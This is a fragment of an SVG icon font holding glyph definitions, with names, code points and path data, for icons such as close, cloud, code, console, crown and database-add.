<glyph glyph-name="close-line" horiz-adv-x="1000" unicode="&#xeee1;" d="M763 650l37-37-262-263 262-262-37-38-263 263-262-263-38 38 263 262-263 263 38 37 262-262z" />
<glyph glyph-name="close-squared-alt" horiz-adv-x="1000" unicode="&#xeee2;" d="M756 528c9 8 9 17 0 26l-51 52c-3 3-8 5-13 5-3 0-5-1-9-2-3-2-5-4-8-6l-152-151c-13-13-33-13-46 0l-155 154c-4 4-8 5-14 5-2 0-4 0-7-2-4-1-7-4-10-6l-47-49c-9-9-9-18 0-27l156-154c13-13 13-34 0-46l-156-155c-3-4-5-8-5-14 0-5 2-10 5-13l52-51c4-3 8-5 14-5 4 0 8 2 12 5l155 155c13 13 33 13 46 0l155-155c4-4 8-5 14-5 4 0 8 2 12 5l52 51c3 3 5 8 5 13 0 6-2 10-5 14l-157 156c-12 13-12 34 1 46l156 154z m150 228c-22 21-48 32-78 32h-656c-30 0-56-11-77-32s-32-48-32-78v-656c0-30 10-56 32-77s47-32 77-32h656c30 0 56 10 78 32 21 21 32 47 32 77v656c0 30-11 56-32 78z m-23-734c0-15-6-28-16-39-11-10-24-16-39-16h-656c-15 0-28 6-38 16-11 11-17 24-17 39v656c0 15 6 28 17 39 10 10 23 16 38 16h656c15 0 28-6 39-16 10-11 16-24 16-39v-656z" />
<glyph glyph-name="close-squared" horiz-adv-x="1000" unicode="&#xeee3;" d="M63 788v-876h875v876h-875z m49-826v776h776v-776h-776z m644 592l-50 52c-4 3-9 5-14 5-4 0-8-2-14-5l-178-177-178 177c-4 3-8 5-14 5-3 0-8-2-13-5l-51-52c-9-9-9-18 0-27l180-177-180-178c-3-4-5-8-5-14 0-5 2-10 5-13l52-51c4-3 8-5 14-5 4 0 8 2 12 5l178 179 178-179c4-3 8-5 14-5 4 0 8 2 12 5l52 51c3 3 5 8 5 13 0 6-2 10-5 14l-180 179 180 177c9 8 9 17 0 26z" />
<glyph glyph-name="close" horiz-adv-x="1000" unicode="&#xeee4;" d="M710 643c-65-65-129-131-194-197-9-9-23-9-31 0-65 66-130 132-195 197-8 9-22 9-31 0-15-16-31-32-47-48-8-9-8-23 0-32 63-64 128-130 194-197 9-9 8-23 0-32-65-66-130-132-195-198-8-9-8-23 0-31l48-48c9-9 23-9 31 0l195 197c8 9 22 9 31 0 64-66 129-131 194-197 8-9 22-9 31 0 16 16 31 32 47 48 9 9 9 23 0 32-63 65-128 130-194 197-8 9-8 23 0 32 65 66 130 132 195 198 8 9 8 23 0 32l-48 48c-9 8-23 8-31-1z" />
<glyph glyph-name="cloud-download" horiz-adv-x="1000" unicode="&#xeee5;" d="M861 405c-20 17-28 34-32 60-12 89-63 151-145 182-86 33-170 24-242-37-15-14-30-21-48-23-34 42-86 69-144 69-104 0-187-84-187-187 0-46 16-87 43-120-31-52-37-113-16-174 30-87 107-141 204-141 71 0 143 0 214 0 73 0 146 0 219 0 90 1 168 55 198 139 30 83 6 175-64 232z m-776 64c0 91 74 164 165 164 51 0 97-23 127-60 7-9 13-18 19-29 7-15 13-32 16-49 1-9 2-17 2-26 0-91-74-164-164-164-29 0-57 7-80 20-10 6-19 12-28 20-7 6-13 12-19 19-23 28-38 65-38 105z m814-279c-23-76-91-126-173-126-72 0-143 0-215 0-73 0-146 0-219 0-84 0-153 50-176 127-15 48-10 95 12 136 9-8 20-15 31-22-15-28-18-61-9-96 17-66 71-107 145-107 140 0 281 0 422 0 76 0 133 41 149 108 17 66-14 129-81 165-9 6-19 20-19 30 2 89-38 156-111 182-82 28-155 2-209-76-3-4-6-8-11-13l-1 0c-3 20-9 39-18 57 11 2 20 8 31 19 64 65 144 77 226 46 79-31 125-92 129-179 0-23 9-36 27-49 67-46 94-126 70-202z m-742 304c4 3 10 3 13 0l51-51v136c0 5 4 9 9 9h36c5 0 9-4 9-9v-140l54 55c4 3 9 3 13 0l21-22c4-3 4-9 0-12l-107-108c-4-3-9-3-13 0l-107 107c-4 4-4 10 0 13l21 22z" />
<glyph glyph-name="cloud-refresh" horiz-adv-x="1000" unicode="&#xeee6;" d="M861 405c-20 17-28 34-32 60-12 89-63 151-145 182-86 33-170 24-242-37-15-14-30-21-48-23-34 42-86 69-144 69-104 0-187-84-187-187 0-46 16-87 43-120-31-52-37-113-16-174 30-87 107-141 204-141 71 0 143 0 214 0 73 0 146 0 219 0 90 1 168 55 198 139 30 83 6 175-64 232z m-776 64c0 91 74 164 165 164 51 0 97-23 127-60 7-9 13-18 19-29 7-15 13-32 16-49 1-9 2-17 2-26 0-91-74-164-164-164-29 0-57 7-80 20-10 6-19 12-28 20-7 6-13 12-19 19-23 28-38 65-38 105z m814-279c-23-76-91-126-173-126-72 0-143 0-215 0-73 0-146 0-219 0-84 0-153 50-176 127-15 48-10 95 12 136 9-8 20-15 31-22-15-28-18-61-9-96 17-66 71-107 145-107 140 0 281 0 422 0 76 0 133 41 149 108 17 66-14 129-81 165-9 6-19 20-19 30 2 89-38 156-111 182-82 28-155 2-209-76-3-4-6-8-11-13l-1 0c-3 20-9 39-18 57 11 2 20 8 31 19 64 65 144 77 226 46 79-31 125-92 129-179 0-23 9-36 27-49 67-46 94-126 70-202z m-639 211c-23-2-43 7-59 26l25 25h-76v-77c8 9 16 16 24 25 16-18 34-30 57-35 22-5 44-4 66 5 35 16 56 43 64 82h-39c-8-30-34-50-62-51z m-9 136c26 2 48-12 59-28-7-7-15-15-24-23h75v75c-8-8-16-15-24-23-34 36-75 48-122 29-36-14-57-42-65-81h39c8 29 33 49 62 51z" />
<glyph glyph-name="cloud-upload" horiz-adv-x="1000" unicode="&#xeee7;" d="M861 405c-20 17-28 34-32 60-12 89-63 151-145 182-86 33-170 24-242-37-15-14-30-21-48-23-34 42-86 69-144 69-104 0-187-84-187-187 0-46 16-87 43-120-31-52-37-113-16-174 30-87 107-141 204-141 71 0 143 0 214 0 73 0 146 0 219 0 90 1 168 55 198 139 30 83 6 175-64 232z m-776 64c0 91 74 164 165 164 51 0 97-23 127-60 7-9 13-18 19-29 7-15 13-32 16-49 1-9 2-17 2-26 0-91-74-164-164-164-29 0-57 7-80 20-10 6-19 12-28 20-7 6-13 12-19 19-23 28-38 65-38 105z m814-279c-23-76-91-126-173-126-72 0-143 0-215 0-73 0-146 0-219 0-84 0-153 50-176 127-15 48-10 95 12 136 9-8 20-15 31-22-15-28-18-61-9-96 17-66 71-107 145-107 140 0 281 0 422 0 76 0 133 41 149 108 17 66-14 129-81 165-9 6-19 20-19 30 2 89-38 156-111 182-82 28-155 2-209-76-3-4-6-8-11-13l-1 0c-3 20-9 39-18 57 11 2 20 8 31 19 64 65 144 77 226 46 79-31 125-92 129-179 0-23 9-36 27-49 67-46 94-126 70-202z m-742 254c4-3 10-3 13 0l51 51v-136c0-5 4-9 9-9h36c5 0 9 4 9 9v140l54-55c4-3 9-3 13 0l21 22c4 3 4 9 0 12l-107 108c-4 3-9 3-13 0l-107-107c-4-4-4-10 0-13l21-22z" />
<glyph glyph-name="cloud" horiz-adv-x="1000" unicode="&#xeee8;" d="M860 406c-21 17-29 35-33 61-12 91-64 154-148 186-87 33-172 24-245-39-22-18-41-25-69-23-93 8-168-49-193-138-4-14-14-30-26-40-75-62-102-152-71-241 31-88 110-143 207-143 73 0 146 0 219 0 74 0 148 0 222 0 92 0 171 56 201 141 31 85 7 178-64 236z m39-219c-25-77-94-127-177-128-73 0-146 0-218 0-74 0-149 0-223 0-86 0-156 50-180 129-24 80 4 158 74 209 12 9 22 25 25 39 18 85 92 140 179 123 26-5 40 0 59 19 65 67 146 79 230 47 80-31 128-93 131-182 1-24 9-37 28-50 69-47 96-128 72-206z m-116 189c-10 5-21 20-20 30 2 91-39 159-113 185-84 29-158 2-213-77-3-4-6-8-11-13-103 51-177 11-191-100-2-10-12-22-22-27-65-38-95-99-77-167 17-67 73-109 147-109 144 0 287 0 430 0 78 1 135 42 152 110 17 68-15 131-82 168z" />
<glyph glyph-name="code-not-allowed" horiz-adv-x="1000" unicode="&#xeee9;" d="M903 520c-22 52-53 99-94 139-40 41-87 72-139 94-54 23-111 35-170 35-59 0-116-12-170-35-52-22-99-53-139-94-41-40-72-87-94-139-23-54-34-111-34-170 0-59 11-116 34-170 22-52 53-99 94-139 40-41 87-72 139-94 54-23 111-35 170-35 59 0 116 12 170 35 52 22 99 53 139 94 41 40 72 87 94 139 23 54 35 111 35 170 0 59-12 116-35 170z m-403 178c93 0 180-36 246-102 57-57 92-131 100-210l-242 104c-3 1-5 0-5-3v-64c0-2 2-5 5-6l174-67c3-1 3-3 0-4l-151-59-92 92 28 116c3 14 5 24 5 29 0 7-2 13-7 17-4 4-11 6-20 6-10 0-16-3-20-9s-7-16-11-32l-20-83-202 203c61 46 134 72 212 72z m-276-136l102-101-172-75c7 65 31 125 70 176z m276-560c-93 0-180 36-246 102-56 56-90 128-99 205l242-104c2-1 4 0 4 2v65c0 3-2 5-5 6l-174 69c-2 1-2 2 0 3l155 60 88-89-28-115c-3-16-5-26-5-30 0-16 9-23 27-23 7 0 12 1 16 5 4 3 7 7 8 13 2 6 4 13 7 23l20 83 202-202c-60-47-134-73-212-73z m276 136l-99 98 168 73c-7-62-31-121-69-171z" />
<glyph glyph-name="code" horiz-adv-x="1000" unicode="&#xeeea;" d="M241 298l184-80c2-1 3 0 3 2v47c0 2-2 4-3 5l-127 49c-1 1-1 2 0 3l127 49c1 0 3 2 3 4v47c0 2-1 3-3 2l-184-79c-2-1-3-3-3-5v-39c0-2 1-4 3-5z m229-118c5 0 9 2 12 4 3 2 5 6 6 10 1 4 3 9 5 17l53 218c2 10 4 17 4 21 0 5-2 10-5 13-4 3-9 4-15 4-7 0-12-2-15-6-2-5-5-13-8-24l-52-218c-3-12-4-19-4-22 0-11 6-17 19-17z m105 38l185 80c1 1 3 3 3 5v38c0 2-2 4-3 5l-185 80c-1 0-3-1-3-2v-47c0-2 2-4 3-4l127-50c2 0 2-1 0-2l-127-50c-1 0-3-2-3-4v-47c0-2 2-3 3-2z m310 517h-770c-29 0-52-23-52-52v-665c0-30 23-53 52-53h770c29 0 53 23 53 53v665c0 29-24 52-53 52z m0-717h-770v577h770v-577z" />
<glyph glyph-name="comment" horiz-adv-x="1000" unicode="&#xeeeb;" d="M935 736c-4 25-16 37-41 39-11 0-22 1-33 1-242 0-484 0-726 0-13 0-26-1-39-4-18-3-27-16-31-33-1-10-3-19-3-29v-491c0-8 1-16 2-23 5-29 16-40 45-40 55-1 110-1 166-2h18v-203c0-9-1-20 10-25 11-5 18 2 26 9 77 71 154 141 232 212 5 4 13 7 20 7 96 1 191 0 287 1 13 0 26 1 39 3 16 3 25 14 28 30 1 10 2 20 2 30v493c1 8 0 17-2 25z m-734-237h298v-68h-298v68z m483-206h-483v68h483v-68z m115 277h-598v67h598v-67z" />
<glyph glyph-name="compass-alt" horiz-adv-x="1000" unicode="&#xeeec;" d="M486 787c-227-6-421-189-423-434-3-242 196-440 436-440 240 0 439 196 439 435-1 242-195 446-452 439z m21-804c-208 0-373 161-374 366-1 202 162 366 365 368 203 1 368-163 369-367 1-197-165-366-360-367z m84 406c-29 6-43 21-49 50-11 57-26 112-39 168-17-55-31-110-42-165-7-31-22-47-54-53-56-11-110-25-166-38 1-1 1-2 1-4 59-14 119-29 178-42 22-5 32-17 37-37 7-32 14-63 21-94 7-29 14-57 20-85 18 62 33 123 48 184 4 17 14 27 30 31 34 8 68 15 102 23 28 7 55 14 88 22-62 14-118 29-175 40z m-90-66c-15 0-26 11-26 25-1 15 12 27 27 26 14 0 25-12 25-26 0-14-11-25-26-25z m-101-58c-7 6-10 4-14-2-14-23-28-45-45-73 22 14 39 24 57 35 29 18 29 19 2 40z m17 184c5 6 6 9-1 13-23 14-46 28-68 42l-2-2c10-17 21-34 31-51 17-28 18-28 40-2z m163-207c0 0 0-1-1-3 25-15 50-31 81-50-13 21-22 36-32 51-22 35-22 35-48 2z m37 195c12 21 25 42 38 62l-3 3c-17-10-34-20-50-31-26-16-29-10-4-36 9-8 13-8 19 2z" />
<glyph glyph-name="compass" horiz-adv-x="1000" unicode="&#xeeed;" d="M494 788c-240-3-433-200-431-438 0-243 195-438 439-438 239 1 435 197 435 437 1 245-199 441-443 439z m6-778c-189 2-339 151-340 338 0 194 156 342 340 341 189 0 334-152 339-329 5-186-142-348-339-350z m88 409c-1 5-5 10-9 12-89 43-178 85-267 128-1 0-2 0-5 1 5-13 9-25 14-36 30-82 60-163 91-244 1-4 5-9 9-11 87-42 174-84 261-125 3-1 6-2 11-5-14 37-26 71-39 105-22 59-44 117-66 175z m-157-108c-24 64-47 127-71 192 63-30 123-59 184-88-38-35-75-69-113-104z" />
<glyph glyph-name="computer" horiz-adv-x="1000" unicode="&#xeeee;" d="M890 724v1h-780v-1c-26-2-44-23-47-48v-526c0-10 2-19 6-27 10-17 25-26 45-26h282v-61h-88c-6 0-10-5-10-10v-41c0-5 4-10 10-10h385c5 0 9 5 9 10v41c0 5-4 10-9 10h-89v61h282c20 0 34 9 44 26 5 9 8 17 8 27v526c-3 25-24 46-48 48z m0-52v-522c0-3-1-5-4-5h-772c-3 0-4 2-4 5v526h780v-4z" />
<glyph glyph-name="connection" horiz-adv-x="1000" unicode="&#xeeef;" d="M885 162c-33 17-66 15-96-6-5-2-8-3-13 0-43 24-83 54-118 89-2 1-3 3-3 5 4 10 6 21 6 33 0 40-24 74-58 89-1 1-1 3-1 5 0 50 6 98 19 146 1 4 2 5 5 6l1 0c30 7 53 26 65 51l1 1c1 2 2 4 2 6l2 3 1 4 1 6 1 2c0 2 1 4 1 7l0 2c1 2 1 4 1 6 0 2 0 3 0 4v5c0 2 0 4 0 6 0 1 0 2 0 2l-1 3c-2 14-7 27-14 38l0 1c-1 1-2 2-2 3l-2 2c0 0 0 1-1 1-5 7-11 13-17 18l-1 0c-1 1-2 2-3 2-1 1-2 1-3 2l-1 1c-14 9-31 14-48 14h-4c-1 0-2 0-3 0h-1c-16-1-31-5-46-14-6-4-11-8-16-13-1-1-2-2-3-3l0 0c-18-19-27-43-25-72l0-1v0c0-5-1-7-5-10-43-24-88-42-135-55-5-1-8 0-11 4-41 52-121 47-156-10-24-39-17-90 17-121 4-4 5-7 4-12-12-48-31-93-55-136-2-4-4-5-8-5-7 0-15 0-22-2-51-10-83-56-76-108 8-59 70-97 126-77 34 12 56 37 63 73 7 37-5 69-35 94-4 3-5 5-3 10 11 43 27 85 48 125 5 9 10 17 20 13 54-3 102 44 98 99 0 4 2 7 6 9 43 24 88 43 136 56 4 1 7 1 9-1 5-6 10-11 17-15 7-6 15-11 23-14 2-2 2-4 2-7 0-45-5-89-15-133-1-5-3-10-5-13-10-1-20-4-29-8-34-15-58-49-58-89 0-12 2-24 6-34 6-17 17-31 31-42 14-11 31-19 49-21l3 0 2 0c1 0 1 0 2 0 1 0 3 0 4 0l3 0 1 0c1 0 2 0 3 0l4 0c12 2 23 5 33 10l0 0c2 1 4 2 6 4 3 2 7 4 10 6l0 1h0c3 1 5 0 8-1 43-24 82-54 117-88 3-3 4-6 2-10-13-44 1-87 38-112 49-33 118-13 141 43 20 47 1 100-45 123z" />
<glyph glyph-name="console" horiz-adv-x="1000" unicode="&#xeef0;" d="M915 718h-830c-12 0-22-10-22-23v-690c0-13 10-23 22-23h830c13 0 23 10 23 23v690c0 12-10 23-23 23z m-12-677c0-13-10-23-23-23h-760c-12 0-22 10-22 23v618c0 12 10 22 22 22h760c13 0 23-10 23-22v-618z m-720 438c42-42 84-84 128-128-42-41-84-83-126-124 8-9 16-17 22-24l150 151-149 149c-7-7-15-15-25-24z m224-282h227v33h-227v-33z" />
<glyph glyph-name="contacts" horiz-adv-x="1000" unicode="&#xeef1;" d="M612 496c-77 0-140-66-140-147 0-79 63-145 140-145 77 0 139 66 139 146 0 80-62 146-139 146z m81-217c-18-21-41-34-68-37-37-4-68 9-93 38-2 2-1 4 0 6 10 22 25 38 47 48 2 0 3 1 5 2-29 20-33 52-25 75 9 24 32 39 56 38 24-1 46-19 53-43 6-24-1-53-27-69 4-3 9-5 13-7 18-10 31-25 39-44 2-3 2-4 0-7z m-508 443v-70c20 0 39 0 57 0 55-1 92-51 79-104-9-36-40-61-76-62-20 0-40 0-60 0v-68c20 0 39 0 58 0 42-1 75-30 80-71 5-41-18-79-56-90-12-4-24-4-36-4-15-1-31 0-46 0v-59c21 0 40 1 60 0 33-1 57-17 71-48 14-30 10-60-10-86-16-22-39-31-65-31-18 0-37 0-56 0v-59s30-58 67-58h601c36 0 66 29 66 66v744c0 36-30 66-66 66h-601c-37-1-67-30-67-66z m427-549c-94 0-170 79-170 178 1 97 77 176 170 176 93 0 169-78 169-176 1-99-75-178-169-178z m-497 128c20 0 41 0 62 0 21 0 42 0 64 0 18 1 29 12 31 31 2 21-14 37-37 38-40 0-80 0-120 0-20 0-34-13-34-33 0-21 13-35 34-36z m129-223c16 0 27 11 28 28 1 15-11 30-25 31-6 1-12-1-17-1-39 0-79 0-118 0-19 0-31-12-31-30 0-17 12-28 31-29 22 0 43 0 65 0 22 1 45 0 67 1z m-132 467c22 0 43 0 65 0 22 0 44 0 66 0 17 0 30 12 30 29 0 16-13 29-30 29-44 1-87 0-131 0-19 0-31-11-31-28 0-18 12-30 31-30z" />
<glyph glyph-name="contrast" horiz-adv-x="1000" unicode="&#xeef2;" d="M890 724v1h-780v-1c-26-2-44-23-47-48v-526c0-10 2-19 6-27 10-17 25-26 45-26h282v-61h-88c-6 0-10-5-10-10v-41c0-5 4-10 10-10h385c5 0 9 5 9 10v41c0 5-4 10-9 10h-89v61h282c20 0 34 9 44 26 5 9 8 17 8 27v526c-3 25-24 46-48 48z m-780-48h780v-1l-780-526 0 1v526z" />
<glyph glyph-name="copyright" horiz-adv-x="1000" unicode="&#xeef3;" d="M500-88c-65 0-124 12-178 34-54 22-100 53-138 92-38 39-67 85-88 138-21 53-32 111-32 174 0 62 11 120 32 174s51 99 88 138c39 39 84 70 138 92 54 22 113 34 178 34s125-11 178-33c54-22 100-53 138-92 38-39 67-86 89-139 21-53 31-111 31-174 0-63-10-121-31-174-22-53-51-99-89-138-38-39-84-70-138-92-53-22-113-34-178-34z m0 88c53 0 101 9 144 27 42 18 78 42 107 74 30 31 52 68 68 111 16 43 23 89 23 138s-8 96-23 138c-16 43-38 80-68 111-29 32-65 56-107 75-43 18-90 27-144 27s-101-9-143-27c-43-19-79-43-108-75-29-31-52-68-67-111-16-42-24-88-24-138s8-95 24-138c15-43 38-80 67-111 30-32 65-56 108-74 42-18 90-27 143-27z m121 237c8-12 14-28 18-47 5-19 7-38 7-59-23-8-44-14-64-17-20-3-41-4-64-4-37 0-70 6-98 19-28 13-52 31-70 52s-33 47-43 77c-10 29-15 60-15 93 0 32 5 63 15 92 9 30 24 56 43 78 18 22 42 40 69 53 27 14 59 20 94 20 27 0 49-1 67-4 17-3 37-9 60-18 0-16-1-33-4-53s-9-37-17-53c-19 7-34 11-47 13-13 2-27 3-42 3-35 0-62-12-80-34-19-22-29-55-29-97 0-45 10-78 30-99 20-21 46-32 78-32 18 0 33 1 45 3 12 2 28 6 47 14z" />
<glyph glyph-name="credit-card" horiz-adv-x="1000" unicode="&#xeef4;" d="M938 573c0 40-33 72-73 72h-730c-40 0-72-32-72-72v-41h875v41z m-875-162v-284c0-40 32-73 72-73h730c40 0 73 33 73 73v284h-875z m268-253c0-3-2-6-5-6h-156c-3 0-5 3-5 6v50c0 3 2 6 5 6h156c3 0 5-3 5-6v-50z" />
<glyph glyph-name="crop" horiz-adv-x="1000" unicode="&#xeef5;" d="M915 191h-154c-12 0-22 10-22 23v351c0 13-11 23-23 23h-353c-12 0-23 10-23 23v154c0 12-10 22-22 22h-35c-12 0-22-10-22-22v-154c0-12-11-22-23-22h-152c-13 0-23-11-23-23v-34c0-13 10-23 23-23h152c13 0 23-10 23-23v-351c0-13 10-23 23-23h353c13 0 23-10 23-23v-153c0-13 10-23 23-23h33c12 0 22 10 22 23v153c0 13 11 23 23 23h154c12 0 22 10 22 23v33c1 13-10 23-22 23z m-279 0h-273c-12 0-23 11-23 23v272c0 13 11 23 23 23h273c13 0 23-10 23-23v-272c0-12-10-23-23-23z" />
<glyph glyph-name="crown" horiz-adv-x="1000" unicode="&#xeef6;" d="M925 505c-13 11-32 13-47 5-16-10-22-26-17-50-78-33-156-66-235-100-37 91-74 180-110 269 26 19 31 44 14 63-15 17-42 18-58 2-18-19-14-42 13-65-37-89-73-179-110-269-80 34-158 67-235 100 5 31-8 52-35 55-21 3-41-16-42-37-1-25 18-41 51-40 0-2 1-4 2-6 33-108 66-215 99-323 3-8 6-11 15-11 180 0 360 0 540 0 9 0 13 2 15 11 31 100 61 199 92 299 3 10 7 20 10 30 25-2 40 6 48 23 6 15 2 33-10 44z m-147-434h-556c-4 0-7-5-7-11v-54c0-6 3-11 7-11h556c4 0 7 5 7 11v54c0 6-3 11-7 11z" />
<glyph glyph-name="cube" horiz-adv-x="1000" unicode="&#xeef7;" d="M879 541c0 1 0 3 0 4-1 3-2 4-4 3-1 0-1-1-2-1-119-69-238-137-356-206-6-3-8-6-8-12 1-136 1-272 1-407 0-2 0-4 0-6 0-3 2-4 3-3 1 0 2 1 3 1 119 69 238 138 356 206 6 3 7 7 7 13 0 136 0 272 0 408z m-398-198c-108 62-215 124-323 187-6 3-12 6-18 10-10 6-18 9-18 7 0-2 0-3 0-4 0-137 0-274-1-411 0-7 4-10 9-13l344-199c3-1 5-3 8-4 5-3 9-2 9 1v7c0 134 0 268 0 401 0 9-2 14-10 18z m346 208c23 14 41 25 40 26-1 1-2 2-3 2-119 69-238 137-357 206-5 3-9 3-14 0-90-52-181-104-271-156-15-9-30-18-45-27-26-14-43-28-40-29 2-2 4-3 6-4 116-67 232-134 349-202 6-3 10-4 17 0 92 54 184 107 276 160 13 8 28 16 42 24z" />
<glyph glyph-name="cubes" horiz-adv-x="1000" unicode="&#xeef8;" d="M705 261c0 2-1 2-2 2 0 0-1 0-1-1-64-37-129-74-193-111-3-2-4-4-4-7 0-74 0-147 0-221 0-1 0-2 0-3 0-1 1-2 2-2 1 1 1 1 1 1 65 37 129 75 193 112 4 2 4 4 4 7 0 74 0 147 0 221 0 1 0 2 0 2z m-215-109c-59 33-117 67-175 101-4 2-7 4-10 5-6 4-10 5-10 4 0-1 0-1 0-2 0-74 0-148 0-223 0-4 2-5 5-7l186-107c1-1 3-2 5-3 2-1 4-1 4 1v3c0 73 0 146 0 218 0 5-1 7-5 10z m187 113c13 7 22 13 22 14-1 0-1 0-2 1-64 37-129 74-193 111-3 2-5 2-8 0-49-28-98-56-147-84l-24-15c-14-8-24-15-22-16 1-1 2-1 3-2 63-36 126-72 189-109 4-2 6-2 10 0 49 29 99 58 149 86 8 5 15 9 23 14z m260 383c0 1 0 1 0 2 0 1-1 2-2 2 0 0-1-1-1-1-64-37-129-74-193-111-3-2-4-4-4-7 0-74 0-147 0-221 0-1 0-2 0-3 0-1 1-2 2-2 1 1 1 1 2 1 64 37 128 75 193 112 3 1 3 3 3 7 0 73 0 147 0 221z m-215-107c-58 33-117 67-175 101-3 2-7 3-10 5-5 3-10 5-10 4 0-1 0-1 0-2 0-74 0-149 0-223 0-4 2-5 5-7l186-107c2-1 3-2 5-3 2-1 4-1 4 1v3c0 73 0 146 1 218-1 5-2 7-6 10z m187 112c13 8 23 14 22 15-1 0-1 0-1 0-65 38-129 75-194 112-3 2-5 2-8 0-49-28-98-56-146-85l-25-14c-14-8-23-15-22-16 1-1 2-1 3-2 63-36 126-73 189-109 4-2 6-2 10 0 50 29 99 57 149 86 8 4 16 9 23 13z m-436-226c0 73 0 147 0 221 0 0 0 1 0 2 0 1-1 2-2 2 0-1-1-1-1-1-65-37-129-74-193-111-3-2-4-4-4-7 0-74 0-147 0-221 0-1 0-2 0-3 0-1 1-2 2-2 0 1 1 1 1 1 65 37 129 74 193 112 3 1 4 3 4 7z m-215 114c-59 33-117 67-176 101l-9 5c-6 3-10 5-10 4 0-1 0-1 0-2 0-74 0-149 0-223 0-4 2-5 4-7l187-107c1-1 3-2 4-3 3-1 5-1 5 1v3c0 73 0 146 0 218 0 5-1 7-5 10z m187 112c13 8 22 14 22 15-1 0-1 0-2 0-64 38-129 75-193 112-3 2-5 2-8 0-49-28-98-56-147-85l-25-14c-13-8-23-15-21-16 1-1 2-1 3-2 63-36 126-73 189-109 3-2 6-2 9 0 50 29 100 57 150 86 8 4 15 9 23 13z" />
<glyph glyph-name="dashboard-web" horiz-adv-x="1000" unicode="&#xeef9;" d="M933 691c-9 20-26 28-48 28-128 0-256 0-385 0h-382c-38 0-55-18-55-56v-630c0-15 3-28 14-38 11-11 25-14 39-14h770c32 0 51 19 51 50 1 213 1 425 0 638 0 7-1 15-4 22z m-629-30c15 0 23-8 23-23 0-16-7-23-22-23-16 0-23 7-23 22-1 17 6 24 22 24z m-80 0c15 0 22-7 22-23 0-17-6-23-22-23-16 0-23 7-23 23 0 15 7 23 23 23z m-81 0c15 0 23-8 23-23 1-15-7-23-22-23-17 0-24 7-24 22 0 16 7 24 23 24z m772-625c0-24-8-31-31-31h-769c-22 0-30 8-30 30v522h829l1-521z m-444 48c34 8 49 43 34 74-1 1-1 5 0 6 13 18 26 36 39 53 1 1 4 2 5 2 14-4 27-1 40 6 1-1 2-1 4-2 17-13 34-26 51-39 2-1 2-4 2-6 0-6-1-12 0-18 2-21 18-38 39-42 20-5 42 5 52 22 12 19 11 42-3 58-2 3-2 5-1 8 18 36 36 72 54 107 2 4 3 5 8 5 27-1 51 22 51 50 0 28-24 51-51 50-21-1-37-10-45-29-8-18-6-36 6-52 2-3 3-5 1-8-18-36-36-72-54-108-1-2-4-4-6-4-9 0-18-2-27-6-2-2-4-2-6 0-17 13-33 25-50 38-4 2-5 5-4 9 8 35-25 67-59 59-34-8-50-43-34-74 1-2 1-5 0-6-13-18-26-35-39-52-1-2-4-3-6-3-7 0-14 2-21 1-27-4-45-32-40-59 6-28 34-46 60-40z m-230 127c54-18 105 2 132 31 0 1 0 1-1 1l-32 29c-20 17-41 35-61 52-2 2-4 5-4 7-10 29-19 58-28 87-4 11-8 22-11 33-44-16-82-61-82-120 0-53 36-103 87-120z m52 120c6-5 11-10 17-15 18-15 35-30 53-46 7-5 13-11 20-16 52 67 22 155-33 186-1 0-1 0-1-1-19-34-38-69-57-104-1-2 0-3 1-4z m44 116c-22 13-63 16-88 8 12-35 23-70 35-106 18 33 35 66 53 98z" />
<glyph glyph-name="dashboard" horiz-adv-x="1000" unicode="&#xeefa;" d="M716 450c5-4 12-3 16 1 13 11 26 22 38 33 5 4 5 10 0 14-118 98-311 132-477 42-88-48-152-117-193-208-24-53-37-109-37-167-1-6 4-10 10-10h50c6 0 11 4 11 10 10 143 75 253 206 317 130 64 257 48 376-32z m128-25c-4 5-10 5-13 0-12-13-24-26-35-39-4-5-4-12-1-16 22-31 39-63 51-98 12-35 18-71 19-107 1-6 5-10 11-10h51c6 0 11 4 10 10-2 97-34 183-93 260z m-51 24c-1-2-3-3-5-4-90-80-179-159-269-238-6-5-11-8-19-7-34 0-56-34-43-64 9-21 31-32 54-27 20 4 34 23 35 45 0 5 0 11 3 15 63 71 125 142 188 213 19 22 39 43 58 65l-2 2z" />
<glyph glyph-name="data" horiz-adv-x="1000" unicode="&#xeefb;" d="M786 658c-16 19-32 38-49 58-13 15-26 30-39 45-13 15-39 27-59 27h-413c-19 0-35-16-35-36v-804c0-19 16-35 35-35h548c20 0 36 16 36 35v648c0 19-11 47-24 62z m-192-209h48v-72h-48v72z m-68 136h48v-208h-48v208z m-143-11c37 1 74-37 74-73h-74v73z m0-90c24 0 47 0 71 0 1 0 2 0 4 0-5-32-21-55-50-69-28-12-63-7-86 13 19 18 37 36 55 54 1 2 4 2 6 2z m-86 39c11 29 41 52 70 52 0-26 0-52-1-77 0-2-1-4-2-6-18-17-35-35-53-53-20 19-26 56-14 84z m-6-217h418v-38h-418v38z m418-191h-418v38h418v-38z m0 81h-418v38h418l0-38z m0 181h-47v164h47v-164z" />
<glyph glyph-name="database-add" horiz-adv-x="1000" unicode="&#xeefc;" d="M472 417c199 0 360 59 360 131v108c0 73-161 132-360 132s-361-59-361-132v-108c0-72 162-131 361-131z m0-251c44 0 86 3 126 9 30 53 87 89 152 89 21 0 42-4 61-11 14 14 21 29 21 45 0 0 1 175 0 178-14-68-170-122-360-122s-347 54-361 122c0-3 0-178 0-178 0-73 162-132 361-132z m103-78c0 6 0 12 1 18-33-4-68-6-104-6-190 0-347 54-361 122v-178c0-73 162-131 361-131 71 0 138 7 194 21-54 29-91 88-91 154z m274 95c-23 23-54 38-89 39h-5c-37 0-70-15-94-39-24-24-40-57-40-94 0-19 4-37 11-53 7-16 17-30 28-42 25-24 58-39 95-39 74 0 133 60 133 134 0 37-14 70-39 94z m-31-114h-44v-43h-39v43h-43v39h43v44h39v-44h44v-39z" />
